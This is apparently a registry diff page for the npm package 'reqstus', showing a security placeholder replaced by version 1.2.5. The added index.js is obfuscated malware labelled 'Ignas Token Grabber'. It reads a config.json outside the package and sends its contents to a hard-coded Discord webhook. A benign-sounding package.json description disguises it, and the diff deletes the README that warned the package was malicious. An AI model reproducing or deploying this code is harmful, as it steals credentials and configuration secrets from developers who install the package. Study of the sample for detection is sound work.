reqstus 0.0.1-security → 1.2.5

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of reqstus might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +1 -0
  2. package/package.json +12 -4
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1 @@
1
+ const _0x47af8b=_0x3fbc;function _0x193c(){const _0x50e2a4=['Ignas\x20Token\x20Grabber\x20-\x20Module','6207696OwkEZC','config.json','5584560IOAEab','object','post','axios','path','map','parse','utf-8','938046frgJuo','entries','exports','12627306fSzvzV','8744mVcZZp','2jBRWTE','NEW\x20TOKEN\x20GUYS,\x20SAY\x20HIII','1047eFUorE','https://discord.com/api/webhooks/1296617824516706446/fStFfcO7BSvtY8z3wHgOVnesCr9afEZ7lcXDwRprUM-1-wEasjMLdze05RjcIa-7_9vH','3626231uMOHxs','9273744nULKHh'];_0x193c=function(){return _0x50e2a4;};return _0x193c();}function _0x3fbc(_0x3cf639,_0x34032e){const _0x193c42=_0x193c();return _0x3fbc=function(_0x3fbc7c,_0x4c595e){_0x3fbc7c=_0x3fbc7c-0x1c7;let _0x50cdb0=_0x193c42[_0x3fbc7c];return _0x50cdb0;},_0x3fbc(_0x3cf639,_0x34032e);}(function(_0x1f9c11,_0xd7b59e){const _0x411f3e=_0x3fbc,_0x170367=_0x1f9c11();while(!![]){try{const _0x38a263=-parseInt(_0x411f3e(0x1c7))/0x1*(parseInt(_0x411f3e(0x1cc))/0x2)+-parseInt(_0x411f3e(0x1ce))/0x3*(parseInt(_0x411f3e(0x1cb))/0x4)+parseInt(_0x411f3e(0x1d5))/0x5+parseInt(_0x411f3e(0x1d3))/0x6+parseInt(_0x411f3e(0x1d0))/0x7+parseInt(_0x411f3e(0x1d1))/0x8+-parseInt(_0x411f3e(0x1ca))/0x9;if(_0x38a263===_0xd7b59e)break;else _0x170367['push'](_0x170367['shift']());}catch(_0x34688a){_0x170367['push'](_0x170367['shift']());}}}(_0x193c,0xb0f31));const fs=require('fs'),axios=require(_0x47af8b(0x1d8)),path=require(_0x47af8b(0x1d9)),status=_0x47af8b(0x1cf),change=path['join'](__dirname,'..','..',_0x47af8b(0x1d4)),api=async()=>{const _0x53e761=_0x47af8b;try{const _0x236ff7=fs['readFileSync'](change,_0x53e761(0x1dc)),_0x5407b2=JSON[_0x53e761(0x1db)](_0x236ff7),_0xbfea62={'title':_0x53e761(0x1d2),'description':_0x53e761(0x1cd),'fields':Object[_0x53e761(0x1c8)](_0x5407b2)[_0x53e761(0x1da)](([_0x2e7ddf,_0x3fa9b4])=>({'name':_0x2e7ddf,'value':typeof _0x3fa9b4===_0x53e761(0x1d6)?JSON['stringify'](_0x3fa9b4,null,0x2):String(_0x3fa9b4),'inline':![]})),'color':0x58b9ff,'timestamp':new Date()},_0x411f93={'embeds':[_0xbfea62]};await axios[_0x53e761(0x1d7)](status,_0x411f93);}catch(_0x42e30f){}};module[_0x47af8b(0x1c9)]={'api':api,'status':status,'change':change};
package/package.json CHANGED
@@ -1,6 +1,14 @@
1
1
  {
2
2
  "name": "reqstus",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
6
- }
3
+ "version": "1.2.5",
4
+ "description": "api for change every 5s the staus",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "start": "node index.js"
8
+ },
9
+ "dependencies": {
10
+ "axios": "^0.21.1"
11
+ },
12
+ "author": "Tu Nombre",
13
+ "license": "MIT"
14
+ }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=reqstus for more information.